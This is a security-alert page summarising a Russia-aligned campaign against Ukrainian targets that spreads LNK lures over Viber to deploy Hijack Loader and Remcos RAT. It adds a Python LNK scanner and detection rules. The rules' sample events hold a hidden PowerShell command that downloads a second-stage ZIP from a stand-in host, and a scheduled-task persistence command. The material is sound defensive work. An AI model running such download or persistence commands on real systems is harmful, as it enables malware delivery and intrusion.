Perceptive Security
SOC/SIEM Consultancy

Russia-Aligned Hackers Abuse Viber to Target Ukrainian Military and Government
Published:
5 January 2026 at 17:56:00
Alert date:
5 January 2026 at 19:02:20
Source:
thehackernews.com
Email & Messaging, Ransomware & Malware, Data Breach & Exfiltration
Russia-aligned threat actor UAC-0184 has been observed targeting Ukrainian military and government entities using the Viber messaging platform to deliver malicious ZIP archives. The campaign represents continued high-intensity intelligence gathering activities against Ukrainian institutions throughout 2025. The attacks leverage social engineering through the popular messaging platform to distribute malware payloads. This activity is part of ongoing cyber operations against Ukraine's critical infrastructure and government systems.
Technical details
The attack chain starts with a Viber message carrying a ZIP archive. Inside are Windows shortcut (LNK) files named to look like Microsoft Word and Excel documents. When opened, each LNK poses as the promised document while running a PowerShell script in the background that fetches a second ZIP archive (smoothieks.zip) from a remote server; that stage deploys Hijack Loader (also tracked as IDAT Loader, see the related links). The loader evades detection with DLL side-loading and module stomping, checks for security software by comparing CRC32 hashes of running process names against a hard-coded list, establishes persistence through a scheduled task, and finally injects the Remcos RAT into a chime.exe process, giving the operators remote control of the host.
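The delivery stage, as an added example that is not from the article or from any vendor tooling: a scanner that opens a ZIP archive in memory and flags members that are Windows shortcuts posing as Office documents, either by a double extension (Report.xlsx.lnk) or by the Shell Link header in their first bytes, which also catches a shortcut renamed to a plain .docx. The sample archive and its entry names are constructed inline for the example.

```python
"""Flag Windows shortcut (LNK) files in a ZIP archive that pose as Office documents.

Added example; the sample archive is constructed inline and is not a real artifact.
"""
import io
import zipfile
from typing import List, Optional, Tuple

# Shell Link header: HeaderSize 0x4C, then LinkCLSID {00021401-0000-0000-C000-000000000046}
# (MS-SHLLINK 2.1). Checking bytes rather than names catches renamed shortcuts.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "00000000" "C0000000" "00000046")
OFFICE_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".pdf", ".rtf")


def classify_entry(name: str, head: bytes) -> Optional[str]:
    """Return a finding label for one archive member, or None if it looks benign."""
    lower = name.lower()
    if lower.endswith(".lnk"):
        stem = lower[:-4]
        if stem.endswith(OFFICE_EXTS):
            return "lnk_with_office_double_extension"   # e.g. Report.xlsx.lnk
        return "lnk"
    if head[:20] == LNK_MAGIC:
        return "lnk_content_under_non_lnk_name"        # shortcut renamed to hide .lnk
    return None


def find_disguised_lnk(zip_bytes: bytes) -> List[Tuple[str, str]]:
    """Scan every file member of a ZIP held in memory; return (name, label) pairs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(20)        # only the header is needed for the magic check
            label = classify_entry(info.filename, head)
            if label:
                findings.append((info.filename, label))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: two disguised shortcuts and two benign files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Salary_Report.xlsx.lnk", LNK_MAGIC + b"\x00" * 64)  # double extension
        zf.writestr("Contract.docx", LNK_MAGIC + b"\x00" * 64)           # renamed shortcut
        zf.writestr("Real.docx", b"PK\x03\x04" + b"\x00" * 64)            # OOXML is itself a ZIP
        zf.writestr("readme.txt", b"plain text")
    return buf.getvalue()


if __name__ == "__main__":
    for name, label in find_disguised_lnk(build_sample_zip()):
        print(f"{label:36} {name}")
```

Explorer hides the trailing .lnk extension by default, which is why the double-extension lure works on the desktop; the header check is the part that survives a rename, so run both rather than trusting the file name.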
Mitigation steps:
Treat ZIP archives received through Viber (and other messaging clients) as untrusted: block or quarantine them at the endpoint, or at least inspect their contents before the user can open them.
Flag archive members that are LNK files named like Office documents (for example a .docx or .xlsx name followed by .lnk); a shortcut has no reason to carry an Office document name.
Alert on powershell.exe launched from explorer.exe (how a double-clicked shortcut runs) whose command line downloads content, in particular a further ZIP archive.
Detect DLL side-loading: a signed executable loading an unsigned DLL from a user-writable directory, and the module stomping that follows (a legitimately mapped DLL whose in-memory code no longer matches the file on disk).
Alert on scheduled task creation (schtasks.exe /create or the equivalent API activity) whose action points into a user profile or other user-writable path.
Detect process injection into chime.exe: remote thread creation or cross-process memory writes into chime.exe from another process.
Note that the CRC32 check for security software runs entirely in memory and is not itself a practical detection point; rely on the behaviors above and on EDR coverage of the loader's evasion techniques instead.
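The detection points listed above, as an added example that is not from the article or any SIEM product: four rules run over a small stream of Sysmon-style process-creation, image-load and remote-thread events. The event dictionaries and their field names are this example's own schema, and the host 203.0.113.10, the user name and every file path are constructed; only smoothieks.zip and chime.exe come from the article.

```python
"""Detection rules for the delivery chain above, run over endpoint telemetry.

Added example. Events are constructed, Sysmon-like dicts; the keys ("event",
"image", "parent_image", "cmdline", "signed", ...) are this example's own
schema, not a vendor's, and every path and host in the samples is made up.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

# Directories a standard user can write to: where dropped loaders, side-loaded
# DLLs and scheduled-task targets from a user-level infection end up.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|documents|desktop)|programdata|windows\\temp)\\",
    re.I,
)
DOWNLOAD_CMD = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I
)


def rule_lnk_powershell_fetch(e: Dict) -> Optional[str]:
    """A double-clicked LNK runs under explorer.exe; here stage 1 pulls a second ZIP."""
    if e["event"] != "process_create" or e["image"].lower() != "powershell.exe":
        return None
    if e.get("parent_image", "").lower() != "explorer.exe":
        return None
    cmd = e.get("cmdline", "")
    if DOWNLOAD_CMD.search(cmd) and ".zip" in cmd.lower():
        return "powershell.exe under explorer.exe downloading a ZIP (LNK stage-1 pattern)"
    return None


def rule_dll_sideload(e: Dict) -> Optional[str]:
    """A signed host process loading an unsigned DLL from a user-writable directory."""
    if e["event"] != "image_load" or e.get("signed", True):
        return None
    if e.get("process_signed") and USER_WRITABLE.search(e["image_loaded"]):
        return f"unsigned {e['image_loaded']} loaded by signed {e['image']} (side-loading)"
    return None


def rule_schtask_persistence(e: Dict) -> Optional[str]:
    """schtasks /create whose task action lives in a user-writable path."""
    if e["event"] != "process_create" or e["image"].lower() != "schtasks.exe":
        return None
    cmd = e.get("cmdline", "")
    if "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
        return "scheduled task created with its action in a user-writable path"
    return None


def rule_chime_injection(e: Dict) -> Optional[str]:
    """A remote thread created in chime.exe by a different process (Remcos injection)."""
    if e["event"] != "create_remote_thread":
        return None
    src, dst = e["source_image"].lower(), e["target_image"].lower()
    if dst.endswith("chime.exe") and src != dst:
        return f"{e['source_image']} created a remote thread in {e['target_image']}"
    return None


RULES: List[Tuple[str, Callable[[Dict], Optional[str]]]] = [
    ("lnk_powershell_fetch", rule_lnk_powershell_fetch),
    ("dll_sideload", rule_dll_sideload),
    ("schtask_persistence", rule_schtask_persistence),
    ("chime_injection", rule_chime_injection),
]


def detect(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Return (event_index, rule_name, message) for every rule hit, in event order."""
    hits = []
    for idx, e in enumerate(events):
        for name, rule in RULES:
            msg = rule(e)
            if msg:
                hits.append((idx, name, msg))
    return hits


APP = r"C:\Users\alice\AppData\Roaming\Chime"          # constructed drop directory
SYS = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed; host 203.0.113.10 is a documentation address
    {"event": "process_create", "image": "explorer.exe", "parent_image": "userinit.exe",
     "cmdline": "explorer.exe"},
    {"event": "process_create", "image": "powershell.exe", "parent_image": "explorer.exe",
     "cmdline": r"powershell -w hidden -c iwr http://203.0.113.10/smoothieks.zip "
                r"-OutFile $env:TEMP\s.zip"},
    {"event": "image_load", "image": APP + r"\updater.exe", "process_signed": True,
     "image_loaded": APP + r"\helper.dll", "signed": False},
    {"event": "process_create", "image": "schtasks.exe", "parent_image": "powershell.exe",
     "cmdline": r'schtasks /create /tn ChimeSync /sc minute /mo 10 /tr "' + APP + r'\chime.exe"'},
    {"event": "create_remote_thread", "source_image": APP + r"\updater.exe",
     "target_image": APP + r"\chime.exe"},
    {"event": "image_load", "image": SYS + r"\svchost.exe", "process_signed": True,
     "image_loaded": SYS + r"\ntdll.dll", "signed": True},
    {"event": "process_create", "image": "powershell.exe", "parent_image": "cmd.exe",
     "cmdline": "powershell Get-Process"},
]

if __name__ == "__main__":
    for idx, name, msg in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {msg}")
```

The two benign events at the end are there on purpose: a signed DLL loaded from System32 and an interactive PowerShell session must stay silent, otherwise the side-loading and stage-1 rules become noise generators in a real environment. Correlating the four hits on one host within a short window is what turns them into a high-confidence alert.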
Affected products:
Viber messaging platform (delivery channel)
Microsoft Word and Microsoft Excel (impersonated by the LNK lures; not themselves exploited)
Windows systems
PowerShell (used for the stage-1 download)
chime.exe (injection target for the Remcos RAT)
Related links:
https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507757&idx=1&sn=cf6b118e88395af45a000aae80811264&poc_token=HNnfW2mjnOhb-9voW7EL-AX6wsrUBqSd4LXEFGMn
https://thehackernews.com/2024/02/new-idat-loader-attacks-using.html
https://thehackernews.com/2024/04/ukraine-targeted-in-cyberattack.html
https://thehackernews.com/2025/07/cyber-espionage-campaign-hits-russian.html
https://thehackernews.com/2024/10/pro-ukrainian-hackers-strike-russian.html
Related CVEs:
Related threat actors:
UAC-0184
IOCs:
smoothieks.zip (second-stage archive fetched by the LNK's PowerShell script)
chime.exe (process injected with the Remcos RAT)
Behavioral indicators: ZIP archives delivered over Viber containing LNK files named like Office documents; PowerShell retrieving a further ZIP archive; DLL side-loading and module stomping; CRC32 hashing of process names to fingerprint security software; scheduled task creation for persistence
This article was created with the assistance of AI technology by Perceptive.
